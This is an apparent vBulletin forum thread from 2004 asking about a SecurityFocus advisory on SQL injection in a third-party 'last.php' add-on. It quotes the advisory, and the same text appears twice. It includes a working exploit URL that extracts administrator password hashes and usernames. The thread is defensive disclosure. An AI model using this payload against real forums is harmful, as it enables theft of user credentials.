buro9
Mon 15th Nov '04, 2:11pm
http://www.securityfocus.com/bid/11658/info/
Has anyone traced the file last.php yet?
Clearly it's not one that remains part of an installed vB... but is it third party? Or is it one of the install, upgrade or merge scripts?
Any clues?
Info on the vulnerability at the above address, but in summary:
vBulletin is reported vulnerable to a remote SQL injection vulnerability. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query.
An attacker exploits this issue to manipulate and inject SQL queries onto the underlying database. It is reportedly possible to leverage this issue to steal database contents including administrator password hashes and user credentials as well as to attack the underlying database.
Update: It is reported that this vulnerability exists in third party scripts that can be used with vBulletin. Currently, the vendor of the affected scripts is not known. This BID will be updated as more information becomes available.
An example URI sufficient to exploit this vulnerability has been provided:
http://www.example.com/last.php?fsel=,user.password%20as%20title,user.%20 %20%20%20username%20as%20lastposter%20FROM%20user, thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT %201
hi all, a new SQL injection found in VBulletin Forums 3.0.x the Vulnerabilite found in last.php, last 10 topics hack. last.php?fsel=,user.password%20as%20title,user.%20 %20%20%20username%20as%20lastposter%20FROM%20user, thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT %201 to solve the problem delet fsel? from ttlast.php and last10.php Best Regards, Dr.Death THE MAN OF THE DARK SIDE
I couldn't find mention of it on these boards... but I'd rather face the flak of starting this thread and have it traced and nuked than have us in the dark about this stuff.
What is the last 10 topics hack?
Has anyone traced the file last.php yet?
Clearly it's not one that remains part of an installed vB... but is it third party? Or is it one of the install, upgrade or merge scripts?
Any clues?
Info on the vulnerability at the above address, but in summary:
vBulletin is reported vulnerable to a remote SQL injection vulnerability. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query.
An attacker exploits this issue to manipulate and inject SQL queries onto the underlying database. It is reportedly possible to leverage this issue to steal database contents including administrator password hashes and user credentials as well as to attack the underlying database.
Update: It is reported that this vulnerability exists in third party scripts that can be used with vBulletin. Currently, the vendor of the affected scripts is not known. This BID will be updated as more information becomes available.
An example URI sufficient to exploit this vulnerability has been provided:
http://www.example.com/last.php?fsel=,user.password%20as%20title,user.%20 %20%20%20username%20as%20lastposter%20FROM%20user, thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT %201
hi all, a new SQL injection found in VBulletin Forums 3.0.x the Vulnerabilite found in last.php, last 10 topics hack. last.php?fsel=,user.password%20as%20title,user.%20 %20%20%20username%20as%20lastposter%20FROM%20user, thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT %201 to solve the problem delet fsel? from ttlast.php and last10.php Best Regards, Dr.Death THE MAN OF THE DARK SIDE
I couldn't find mention of it on these boards... but I'd rather face the flak of starting this thread and have it traced and nuked than have us in the dark about this stuff.
What is the last 10 topics hack?